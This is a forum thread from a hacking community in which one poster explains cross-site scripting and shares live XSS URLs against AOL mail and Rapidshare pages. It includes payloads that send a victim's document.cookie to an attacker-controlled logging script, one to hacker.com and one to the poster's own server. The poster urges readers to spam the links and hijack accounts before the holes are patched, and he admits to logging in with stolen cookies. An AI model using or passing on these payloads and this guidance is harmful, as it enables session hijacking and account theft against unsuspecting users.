ganglia
+ Reply to Thread
Results 1 to 7 of 7

Thread: Cross site scripting

  1. #1
    Join Date
    Sep 2005
    Posts
    2,050

    Cross site scripting

    There have been a few posts on this forum, and webpages about cross site scripting, for example:

    [url]http://www.net-force.nl/files/articles/hotmail_xss/[/url]

    But nearly all of them do not work, by the time the exploit has been made public enough to have a whole page written about it, the vulnerable pages have either been fixed or will be within days. I am just posting an example of a working XSS exploit (at the moment it is anyway) so people can actually see how it works, instead of following links in that tutorial that are outdated and fixed months ago. It took me about 20 minutes looking through the latest exploits from various mailing lists and websites to find one good enough to post about, it is for aol mail. First I will explain cross site scripting though. Cross site scripting (or XSS) is exploiting bad programming in websites, people like us find vulnerabilities in a page and exploit it. The things we exploit are holes where we can inject code, usually websites filter html, javascript etc, but these holes allow us to add code to the page that can do anything. The thing that XSS is used for is to steal someone's cookie, a text file that is created whenever you log in to any online service, like email. Cookies are restricted; they are only accessible when you are on the site that created it, for example when you log in to hotmail the cookie will stay and can be accessed from any site that is .msn.com, like the ilovemessenger.msn.com exploit. It's a pretty good security system, only trusted sites from the correct domain can access the cookie, which could potentially give the attacker access to the account. XSS can get around this though, like I said before, XSS can "inject" custom code, so you could add whatever malicious code you liked, so you can craft a url which will exploit the vulnerability, and will transmit the cookie to your own server, giving you access to their account, because it was stolen while they were still on the correct domain, the code just added stuff to the page and you were on a trusted page. Back to the exploit then, the one I found was from here:

    [url]http://seclists.org/lists/bugtraq/2006/Jan/0*25.html[/url]

    It was from January, but from what I can tell it is still working (it is aol, what did you expect). I would have preferred a XSS from hotmail (because I use hotmail), but it's still a pretty big exploit, anyone reading this who uses or knows someone who uses aol has the ability to hack their account just by the target clicking one link from an email (you have to have a ftp server, get one for free), if someone spammed out this link you could hack *000s of accounts within days if the vulnerability isn't fixed. I do not have time to go through everything about this, I may do later though. The vulnerability exists in about 7 aol pages, listed on that link I gave you. To prove it works, go to this url:

    http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><script>alert('VULNERABLE')</script>

    Copy the WHOLE link right up to the end of the page, copy and paste if necessary. That should bring up a popup of "VULNERABLE", if it does then it is still working and that means you can replace the simple "vulnerable" popup with a malicious cookie stealing script. If there's anyone who has an aol account reading this, sign in to your aol mail account, then when you are on your inbox in your browser type and go to this url:

    http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><script>alert(document.cookie)</script>

    It should popup with your cookie data, this means that you can steal other people's cookies. I will post more on this later, like how to log stolen cookies to your website.
    Last edited by Ezekiel; 02-06-2006 at 01:04 PM.

  2. #2
    Join Date
    Sep 2005
    Posts
    2,050

    Xss

    Continued from last post:

    I have given just one link that exploits aol, on that link I gave you earlier there was about 7 vulnerable pages on aol that this could be used for, and there are probably lots more than the 7 they found. By the time an exploit like this reached pages like

    [url]http://www.net-force.nl/files/articles/hotmail_xss/[/url]

    it is already fixed, that's why you have to read the latest exploit mailing lists like bugtraq etc, which can be found online on various sites (pm me and I will give links). It does require a small amount more knowledge to use exploits directly from these sites/mailing lists (because they aren't explained fully in a tutorial), but as long as you are willing to be patient in reading and understanding it, then it's the only way to get to exploits like XSS first before everyone else, if you don't then all you will have is the outdated tutorials that are fixed as soon as they are that widespread. This is probably as big as the hotmail exploit on that net-force page(lots of people use aol), but it just hasn't had a tutorial written yet, so use it before they fix it. This could hack AIM accounts as well because they use the same email account, so you could possibly send the link in an IM conversation(if they are logged in to their email), but as I said I don't use aol or aim so I don't know their system. Back to the cookies, it's pretty much exactly the same method to log the cookies as on the net-force page, set up a php supporting website, upload his php cookie logging script to it(from the net-force site), then all you have to do is replace the part between <script> and </script> on the url you are going to use to exploit it(find one on the bugtraq page or use my one) with his example:

    <script>location.href='http://www.hacker.com/cookielogger.php?cookie='+document.cookie</script>

    The script would be something like that, but you have to modify it correctly to log the cookie to your site, I just randomly took that from the net-force article.

    So the full script would be:

    EDIT: Forget the script I posted, the net-force version has to be modified a bit to fit the aol hack.

    Of course [url]www.hacker.com/cookielogger.php[/url] is replaced with the url of YOUR site, then you can test it and then try sending the link to yourself (when logged in to an aol account) and see if it logs. Then, depending on what you want to do, you could spam it out and hack whoever's account you want, but you would have to look at how aol displays hyperlinks, you don't want the victim to see a huge long link that just makes them not trust it. Anyway, on

    [url]http://www.net-force.nl/files/articles/hotmail_xss/[/url]

    things are explained well, like how to use the cookie once you have it and stuff, just follow the instructions and apply them correctly to the aol hack, it's not very hard. the reason I chose this vulnerable page

    http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><script>alert('VULNERABLE')</script>

    is that the <script> part at the end is just a simple script tag, some people might get confused when you have to add extra stuff as well as that so I am just trying to keep it simple, but all the other provided links on that bugtraq exploit are vulnerable, so use them. Also, if you were going to use this to hack accounts, remember to follow the net-force tutorial and make a redirect page.
    Last edited by Ezekiel; 02-07-2006 at 12:25 PM.

  3. #3
    Join Date
    Feb 2006
    Posts
    10

    nice !!

    well just a addidtion
    The same basic concept as mike told above can be used in any forum or place which allow javascript in sigs or posts ..
    so its a good practice to keep java n html of on ur forums etc ..
    <script>alert(document.cookie)</script>

  4. #4
    Join Date
    Sep 2005
    Posts
    2,050

    xss

    Just one more thing to say, I have only tested the aol xss exploit up to bringing up the cookie popup, so I cannot promise it will work for anything else, test it yourself first and use your knowledge + other tutorials to set up a php script on your site to take the cookie input and write to file. Even if this exploit gets fixed/doesn't go any further than showing the user's cookie, there are lots more xss vulnerabilities getting discovered every day, so check these mailing lists:

    [url]http://www.securityfocus.com/archive/*[/url]
    [url]http://seclists.org/lists/fulldisclosure/2006/Feb/index.html[/url]

    These are online versions, subscribe to get the posts by email. If you wait for a tutorial to be published about a vulnerability, then it will already be too late, check these mailing lists and you will be able to use them before someone makes it too public and it immediately gets fixed. Look for XSS in these mailing lists to find cross site scripting vulnerabilities. Some of those and other exploit mailing lists are archives, so may not be updated until the end of each month, so you should subscribe (get them sent dirsctly to email account instead of viewing them online) and get the latest exploits.
    Last edited by Ezekiel; 02-07-2006 at 01:33 PM.

  5. #5
    Join Date
    Sep 2005
    Posts
    2,050

    xss

    Another example of xss in a commonly used website is from rapidshare, the file hosting service that a lot of people use. Again, it is from a good mailing list (full disclosure). Here is a link to the archived version, it is a reply to the original, but still contains the original message in a quoted form (with the >>):

    [url]http://archives.free.net.ph/message/20060*2*.0**746.*28**4*a.en.html[/url]

    The exploit may not be as useful as one for a major email provider, but it's worth having a look at, here's the url used to exploit it:

    https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=<script>alert("XSS%20VULNERABILITY%20HERE");</script>&password=anything

    If a box pops up with the "xss in rapidshare" message, then it's still working. Again, this could be used to steal cookies by changing the javascript and then gain access to their account, but it's not like an email xss, there is no real way to get your url to the victim that will use the exploit, I don't have a rapidshare account, but they might allow messages to be sent between users, that would be a way to get the url (that will steal their cookie) to them. If anyone really wanted to have rapidhare accounts, then this would help them, other than that it's mostly useless, it's just another example of xss. A few useful mailing lists to watch if you are interested in exploits like this and want the latest discoveries of exploits/news are:

    *. Bugtraq, join by following these instructions:

    "Send an e-mail message to [email]bugtraq-subscribe@securityfocus.com[/email]. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer."

    You will then receive all the latest emails from other subscribers about vulnerabilities, this way you and other subscribers will be the first to know stuff.

    2. Full disclosure, join by going to this url:

    [url]https://lists.grok.org.uk/mailman/listinfo/full-disclosure[/url]

    Then fill in your email in the form then follow instructions after receiving the email.

    *. Vuln-dev, join by following these instructions:

    "0.2.* How do I subscribe?

    Send an e-mail message to [email]LISTSERV@SECURITYFOCUS.COM[/email] with a message body of:

    SUBSCRIBE VULN-DEV Lastname, Firstname

    You will receive a confirmation request message to which you will have to answer. "


    This is just * useful mailing lists, there are a lot more that are related to vulnerabilities, I subscribe to over *0 vulnerabilities and exploit mailing lists so google if you want more.

  6. #6
    Join Date
    Sep 2005
    Posts
    2,050

    xss

    The aol xss vulnerability is STILL working, i'm surprised they have not done anything about it yet. Here's the url will prove whether it's still working:

    [URL]http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><script>alert('VULNERABLE')</script>[/URL]
    http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><script>alert('VULNERABLE')</script>

    If it brings up the "vulnerable" popup, then it's working.

  7. #7
    Join Date
    Sep 2005
    Posts
    2,050

    xss

    I didn't test that aol xss exploit any further than showing your cookie data, and it seems that's actually as far as it goes, I have tried testing it today and it will not redirect to my own cookielogging script. I know it is an individual problem in the aol xss, because I have used my small javascript script to perform many xss attacks in the past. I use:

    <script>document.location = 'http://my_site's_url_here/my_cookie_log_directory/testscript*?cookie=' + document.cookie;</script>

    And that script sends the logs to my server, waiting for me to temporarily use the cookies for logging in unauthorised to the site. Even though the aol xss doesn't work, there are at least 5 new xss exploits available every day on the mailing lists I subscribe to, usually just harmless exploits for stuff like forums, but I sometimes get exploits that are useful to me.

+ Reply to Thread

Similar Threads

  1. Cross-site scripting phpBB
    By StickyTapeNinja in forum Tutorials
    Replies: 2
    Last Post: 05-11-2007, 05:18 PM
  2. Scripting, langauges, Os, etc...
    By mlg solidsnake in forum Tutorials
    Replies: 12
    Last Post: 04-25-2007, 05:23 PM
  3. Orkut Multiple Cross Site Scripting Vulnerabilities
    By ddlmail in forum Viruses and Trojans
    Replies: 0
    Last Post: 12-10-2006, 05:08 PM
  4. Bat Scripting
    By Demonizer in forum Viruses and Trojans
    Replies: 5
    Last Post: 03-08-2006, 09:37 PM
  5. Program for scripting trojans.
    By Alucard in forum Viruses and Trojans
    Replies: 4
    Last Post: 01-19-2006, 08:21 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts